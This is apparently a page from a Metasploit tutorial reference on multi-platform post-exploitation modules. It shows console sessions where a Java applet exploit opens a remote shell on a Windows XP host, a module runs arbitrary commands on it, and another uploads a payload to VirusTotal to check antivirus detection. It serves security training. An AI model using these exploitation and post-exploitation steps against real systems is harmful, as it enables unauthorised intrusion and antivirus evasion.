Multiple OS Post General Modules

a11y.text Multiple OS Post General Modules

This module will execute arbitrary commands to an open session. It works on Windows, Linux, OSX, and Unix platforms.

msf  post(execute) >
[*] 10.10.0.100      java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] Sending stage (2976 bytes) to 10.10.0.100
[*] Command shell session 1 opened (10.10.0.151:4444 -> 10.10.0.100:1173) at 2012-08-31 15:06:06 -0400

msf  post(execute) > show options

Module options (post/multi/general/execute):

   Name     Current Setting       Required  Description
   ----     ---------------       --------  -----------
   COMMAND  echo hell > file.txt  no        The entire command line to execute on the session
   SESSION  1                     yes       The session to run this module on.

msf  post(execute) > run

[*] Executing echo hell > file.txt on #>Session:shell 10.10.0.100:1173 (10.10.0.100) "Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\administrator\Desktop>">...
[*] Response:
[*] Post module execution completed

msf  post(execute) >  sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\administrator\Desktop> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 2CB7-2817

 Directory of C:\Documents and Settings\administrator\Desktop

08/31/2012  09:04 AM    >DIR>          .
08/31/2012  09:04 AM    >DIR>          ..
08/31/2012  09:04 AM                46 file.txt
12/29/2011  03:52 PM                70 portlist.txt
               2 File(s)          1,431 bytes
               2 Dir(s)   4,899,721,216 bytes free

C:\Documents and Settings\administrator\Desktop>

This module uploads a file to virustotal.com and displays the scan results. It can also be run directly from within a meterpreter session. Works on Windows, Linux, OSX, and Unix platforms.

msf post(check_malware) > show options

Module options (post/multi/gather/check_malware):

   Name        Current Setting      Required  Description
   ----        ---------------      --------  -----------
   APIKEY                           yes       VirusTotal API key
   REMOTEFILE  C:\msfrev.exe        yes       A file to check from the remote machine
   SESSION     1                    yes       The session to run this module on.

msf post(check_malware) > run

[*] 192.168.101.129 - Checking: C:\\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\msfrev.exe (38 / 55):

=====================================================================================================================================

 Antivirus             Detected  Version        Result                           Update
 ---------             --------  -------        ------                           ------
 ALYac                 true      1.0.1.5        Gen:Variant.Zusy.Elzob.8031      20151125
 AVG                   true      16.0.0.4460    Agent                            20151125
 AVware                true      1.5.0.21       Trojan.Win32.Swrort.B (v)        20151124
 Ad-Aware              true      12.0.163.0     Gen:Variant.Zusy.Elzob.8031      20151125
 AegisLab              false     1.5                                             20151125
 Agnitum               true      5.5.1.3        Trojan.Rosena.Gen.1              20151124
 AhnLab-V3             true      2015.11.26.00  Trojan/Win32.Shell               20151125
 Alibaba               false     1.0                                             20151125
 Arcabit               true      1.0.0.624      Trojan.Zusy.Elzob.D1F5F          20151125
 Avast                 true      8.0.1489.320   Win32:SwPatch [Wrm]              20151125
 Avira                 true      8.3.2.4        TR/Crypt.EPACK.Gen2              20151125
 Baidu-International   true      3.5.1.41473    Trojan.Win32.Rozena.AM           20151124
 BitDefender           true      7.2            Gen:Variant.Zusy.Elzob.8031      20151125
 Bkav                  false     1.3.0.7383                                      20151125
 ByteHero              false     1.0.0.1                                         20151125
 CAT-QuickHeal         true      14.00          Trojan.Swrort.A                  20151125
 CMC                   false     1.1.0.977                                       20151124
 ClamAV                true      0.98.5.0       Win.Trojan.MSShellcode-7         20151125
 Comodo                true      23654          TrojWare.Win32.Rozena.A          20151125
 Cyren                 true      5.4.16.7       W32/Swrort.A                     20151125
 DrWeb                 true      7.0.16.10090   Trojan.Swrort.1                  20151125
 ESET-NOD32            true      12622          a variant of Win32/Rozena.AM     20151125
 Emsisoft              true      3.5.0.642      Gen:Variant.Zusy.Elzob.8031 (B)  20151125
 F-Prot                true      4.7.1.166      W32/Swrort.A                     20151125
 F-Secure              true      11.0.19100.45  Gen:Variant.Zusy.Elzob.8031      20151125
 Fortinet              true      5.1.220.0      W32/Swrort.C!tr                  20151125
 GData                 true      25             Gen:Variant.Zusy.Elzob.8031      20151125
 Ikarus                true      T3.1.9.5.0     Trojan.Win32.Swrort              20151125
 Jiangmin              false     16.0.100                                        20151124
 K7AntiVirus           true      9.212.17966    Backdoor ( 04c53cce1 )           20151125
 K7GW                  true      9.212.17968    Backdoor ( 04c53cce1 )           20151125
 Kaspersky             true      15.0.1.10      HEUR:Trojan.Win32.Generic        20151125
 Malwarebytes          true      2.1.1.1115     Backdoor.Bot.Gen                 20151125
...snip...

[*] Post module execution completed
meterpreter > run post/multi/gather/check_malware REMOTEFILE=C:\\msfrev.exe

[*] 192.168.101.129 - Checking: C:\Users\loneferret\Downloads\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\\msfrev.exe (35 / 54):

=====================================================================================================================================

 Antivirus             Detected  Version        Result                         Update
 ---------             --------  -------        ------                         ------
 ALYac                 true      1.0.1.5        Gen:Variant.Zusy.Elzob.8031    20151125
 AVG                   true      16.0.0.4460    Agent                          20151125
 AVware                true      1.5.0.21       Trojan.Win32.Swrort.B (v)      20151124
 Ad-Aware              true      12.0.163.0     Gen:Variant.Zusy.Elzob.8031    20151125
 AegisLab              false     1.5                                           20151125
 Agnitum               true      5.5.1.3        Trojan.Rosena.Gen.1            20151124
..snip..
Next
Auxiliary Module Reference
Prev
Post Gather Modules